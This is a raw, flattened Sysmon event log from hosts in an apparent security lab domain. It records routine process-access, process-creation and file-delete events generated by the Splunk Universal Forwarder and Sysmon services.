08:04:34.333{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083930Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.333{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083929Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.333{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083928Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.333{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B592-615A-A701-00000000FD01}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083927Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.333{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B592-615A-A701-00000000FD01}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083926Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.334{2FDD8D40-B592-615A-A701-00000000FD01}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083925Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.067{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4E1EB47637885879595ED6BC276ABC3,SHA256=BDFC20D29553E9A31E9A9D1DD53834FF8A7775D71857B1F6B66E0DF009E7511A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083924Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.051{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CD2C77D7E389AC1CA5D927B271FB71F,SHA256=7778C0B9A9D44580206A5DA54153948A2821A6F9C437A803704B0D1945D06939,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108436Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:35.362{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E95C6DDFB41F3CA77A084EE2F701A0C4,SHA256=B374EDF5481EE60A13D73BB38064C25E3059BCEEF0456A50541EB0CE8C89DB9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083956Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.646{2FDD8D40-B593-615A-A801-00000000FD01}27123492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083955Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.473{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B593-615A-A801-00000000FD01}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083954Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.473{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083953Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.473{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083952Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.473{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083951Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.473{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083950Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.473{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083949Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.473{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083948Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.473{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083947Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.473{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083946Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.473{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083945Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.473{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B593-615A-A801-00000000FD01}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083944Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.473{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B593-615A-A801-00000000FD01}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083943Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.475{2FDD8D40-B593-615A-A801-00000000FD01}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083942Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.333{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0870DBAE78C56930E1352024B95E7832,SHA256=DE7C6F456FAFF9E59084851F7F246E5E85F270F44F172D226AAAC344EB97ED2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083941Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:35.067{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=043EB5B036C60526886A5B19F9722191,SHA256=A3C7D5C97CCE3DB4980DB7BFAFB9315F5A0AC93A30F71CA68C17255FA89C39BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083972Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.706{2FDD8D40-B594-615A-A901-00000000FD01}31164088C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083971Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.550{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B594-615A-A901-00000000FD01}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083970Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.550{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083969Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.550{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083968Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 